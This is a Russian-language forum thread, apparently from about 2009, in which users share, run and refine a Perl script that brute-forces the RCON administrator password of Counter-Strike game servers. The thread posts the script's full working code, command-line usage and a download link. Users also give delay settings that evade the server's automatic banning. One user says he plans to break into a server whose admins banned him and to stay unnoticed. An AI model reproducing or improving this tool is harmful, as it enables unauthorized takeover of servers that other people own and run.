eLWAux сорри за глупые в перле я не сильно шарю вопросы,но опишу порядок своих действий . 1)поставил ActivePerl-5.10.0.1003 2)нашел сервачек в своей локалке к примеру вот 204.205.206.207:27015 3)захожу в файл csBrute-RconPassword.pl блокнотом правлю там строки(1.2.3.4 меняю на 204.205.206.207;строки abc usernamer не трогаю ), use IO::Socket; print "\n". " CS <RCON password> bruter\n". " eLwaux(c)2009\n\n\n"; if (!$ARGV[0]) { print " use: csBrute.pl <host> <port> <server password > <name>\n". " csBrute.pl 204.205.206.207 27015 abc usernamer\n"; 4)2 раза мышью кликаю на файле csBrute-RconPassword.pl ,а он отрывается и тут же закрывается . Что не так делаю? Ведь на серваке нет <server password > <name>,а я их не меняю ну и имя админа впринципе никчему для брута.
аси нету есь емаил найдеш в моем профиле или луче через форум я постоянно сморю его в ету тему пиши ,а так то я все правильно сделал?У мня 2 сетевухи 2 мож отрубить надо попробую вечером мож запашет
Для начала тебе нужно немного подправить код csBrute-RconPassword.pl , открой csBrute-RconPassword.pl блокнотом NotePad далее замени код на вот этот: use IO::Socket; print "\n". " CS <RCON password> bruter\n". " eLwaux(c)2009\n\n\n"; if (!$ARGV[0]) { print " use: csBrute.pl <host> <port> <server password > <name>\n". " csBrute.pl 1.2.3.4 27015 abc usernamer\n"; exit(0); } $host = shift || '1.2.103.250'; $port = shift || '27015'; $serverpass = shift || 'n0th1ng'; $name = shift || 'pomKa'; $pasw = 'server is not protected by password!'; open (FILE, '<pass.txt') || die(" [-] pass.txt not found!\n"); my @p : shared = <FILE>; print ' > Loaded '.scalar(@p)." password(s)\n"; chomp(@p); close(FILE); my $good = 0; my $sock = new IO::Socket::INET( PeerAddr=>$host, PeerPort=>$port, Proto=>'udp') || die " [-] server not found!"; $c = "\xFF\xFF\xFF\xFFgetchallenge valve\x0a"; syswrite $sock, $c; sysread $sock,$a,65535; # ****A00000000 99271855 2 if ($a =~ /\xFF\xFF\xFF\xFFA00000000\x20(\d+)/) { $id = $1; $c = "\xFF\xFF\xFF\xFF". "connect 47 ".$id." ". '"\prot\2\raw\d984a05fa268b7cc6ac052a38960aeb'.rand(9).'" '.#2 '"'. '\_cl_autowepswitch\1'. '\bottomcolor\6'. '\cl_dlmax\80'. '\cl_lc\1'. '\cl_lw\1'. '\cl_updaterate\20'. '\model\gordon'. '\name\\'.$name. '\topcolor\30'. '\_pw\cracker'. '\lac_id\LACID_NOLAC'.rand(9).''. '\_vgui_menus\1'. '\_ah\0'. '\lang\ru'. '\dzuid\DZUID_0:0:7528570'.rand(9).''.#9 '\rate\25000'. '\*fid\0'. '\password\\'.$serverpass. '"'."\x0a"; # print $c; syswrite $sock, $c; sysread $sock,$a,65535; # full server: ****B 129 "1.2.3.4:25015" 0 # unk password: BADPASSWORD # serv full : SERVERISFULL if ($a =~ /SERVERISFULL/) { print 'FULL SERVER. waiting few seconds..'."\n"; sleep(10); } elsif($a =~ /BADPASSWORD/) { print " [-] Bad PlayerPassword!\n"; exit(0); } else { $good = 1; } } else { if ($a=~/banned/) { print ' [!] you are banned!'."\n". " change IP!\n"; exit(0); } else { print ' [-] some trouble with answer ('.$a.')!'."\n"; exit(0); } } while(1) { sleep(10); # server is not full # and we are connected $c = "\xFF\xFF\xFF\xFF". "rcon ".$id.' "'.$pasw.'" sv_restart 1'."\x00"; syswrite $sock, $c; sysread $sock,$a,65535; # print '---'.$a."\n\n\n\n"; if ($a =~ /Bad rcon_password/) { #bad rcon_password print ' - '.$pasw."\n"; } else { print ' [+] '.$pasw."\n"; exit(0); } $pasw = shift @p; if (!$pasw) {print ' [-] password not found!';exit(0);} } exit(); Далее заходишь в c:\WINDOWS\system32\ и находишь там файл cmd.exe , копируешь его в папку с брутом. В папке с брутом запускаешь cmd.exe и в командной строке прописываешь следующие: csBrute-RconPassword.pl 78.84.231.21 27015 Вместо 78.84.231.21 ип адрес сервера который ты собрался брутить. P.S Теперь вопросов не должно быть (=
Спасибус огромнейшус я вроде так и делал тока сначала запускал командную строку а потом мышкой перетаскивал в нее файл csBrute-RconPassword.pl ,прописывал айпи и порт и нифига стоит кстати потом еще раз попробовал по твоему способу нашел пароль ,а перетаскиванием мышью нехатит. Скорость тока малявата и многопоточности бы добавить немешало(для увеличения скорости).Ну это уже кое-что будем эксперемнтировать дальше скорость ведь надо поднимать ,завтра есче на своем цевильном с amx_плагинами серваке попробую обязательно отпишусь.
Наскоко я лазил по всяким форумам с рконом писали,что такого в природе не существует могет тока у хакеров
sleep (3) и sleep(10) ,цифры 3 и 10 означают задержку в секундах перед постановкой нового пароля?Да и ещё а как сохранять пройденный этап в словаре моно как то реализовать. И как сделать с полным перебором по буквам и символам чтоб он работал,т.е. даж без словарика.
Провел тест на своем серваке вот что на нем было установлено: AMX Mod X 1.71 Metamod-1.19 StatsMe 2.8.3 HLGuard 1.9n4 + Reallite HLGuard Anti-Cheats Config 1.7 DeathMatch Mod 1.7 ( csdm_active 1 в amxx.cfg (...addons\amxmodx\configs\ ) ) ATAC 2.5.5.0 Резултаты такие: 1)при sleep (1)-(7)банит сама Hlds 2)при sleep (8) не банит пароль найден
Интересную штуку я заметил эта прога может удаленно посылать команды в консоль сервера (в данном случае ркон пароли посылает) было бы класно еслиб она делала разбан игрока всеволишь то надо в словарик с паролем записать amx_unban "204.205.206.207" и подредоктировать csBrute-RconPassword.pl чтоб посылал эту команду, а пока что она впереди прописывает rcon 1851658075(т.е. id игрока). eLWAux можешь подредактировать csBrute-RconPassword.pl или думаеш что это бредовая идея?
ничего редактировать не надо! открываешь cmd в той дире, где скрипт, и запускаешь: Code: [color=darkorange][b]csBrute-RconPassword.pl [u]IP-сервера[/u] [u]порт(по дефолту 27015)[/u] [u]пароль (если пустой, пишеш что угодно)[/u] [u]имя, под которым скрипт будет заходить на сервер[/u][/b][/color] возможности распределонного брута пока нету. "как сделать с полным перебором по буквам и символам"? все пароли в файле pass.txt, туда и кидай все что нужно. с помощью спец. програм создавай список и юзай его. вот за тест огромное спасибо. сейчас перезальлю и поставлю задержку в 8секунд. да запросто, ето 5минут.. тольно зачем?) сбрутил пароль ркон, зашел на сервер и командуешь там.. хотя сделаю сейчас.. ждите 20минут )
удаленное администрирование , зная RCON пароль, кс сервера csBrute-Rcon.pl <host> <port> <rcon password> <name> uasc.org.ua/files/csBrute-.zip
Отлично спасибо у меня тока вот какой вопрос счас возник почему там два файлика csBrute-RconPassword1.pl и csBrute-RconPassword2.pl(ну в принципе и в старом было тоже 2) они оба используются в переборе или надо сначала попробовать запустить первый csBrute-RconPassword1.pl в cmd.exe а потом второй попробовать csBrute-RconPassword2.pl (я к тому спрашиваю потому как в старом тоже 2 лежало файла csBrute-RconPassword.pl и csBrute-RconPassword2.pl я тестил тока со sleep (8) тока с csBrute-RconPassword.pl)? А так все COOL завтра попробую еще потестить потом отпишусь обязательно.
Хочу попробовать разбанить себя без ркон-пароля кидаю в словарик amx_unban "204.205.206.207" и вуаля разбан,а мож получится.Видиш ли там где на самом деле я собрался брутить пас там админы ухо в остро держать,спалят меня и ппс могут вообще отключить,а так я свое дело зделаю быстро и незаметно.Там айпишник хрен поменяешь,а если поменяю обещали вообще вырубить уже не первый раз ведь.Так что помоги мож че и выйдет,а то я пробовал кидать в словарик amx_unban "204.205.206.207" а он мне в консоле сервака такую строку выдает rcon 1851658075 "amx_unban "204.205.206.207"" ,а выдавал бы такую в консоле сервака "amx_unban "204.205.206.207" без rcon 1851658075 мож ченить и получилось.
еще как существует, сам проверял: поднимал серв на локалке пытался подключиться с другой машины... и облом, если ркон пустой, то хрен получится(( мож кто знает лекарство от таких умников? ЗЫ: Oledga, дай линк где прочитал что ркон пустым не может быть...
Протестил я твою новую мегасборку,результаты такие: 1)csBrute-RconPassword1.pl выдает ложный пароль на 7 в списке pass(т.е. находит не тот пароль) 2)csBrute-RconPassword2.pl виснет после 5 паролей 3)csBrute-PlayerPassword.pl работает отлично находит пароль(даже работает при sleep (1) не банит)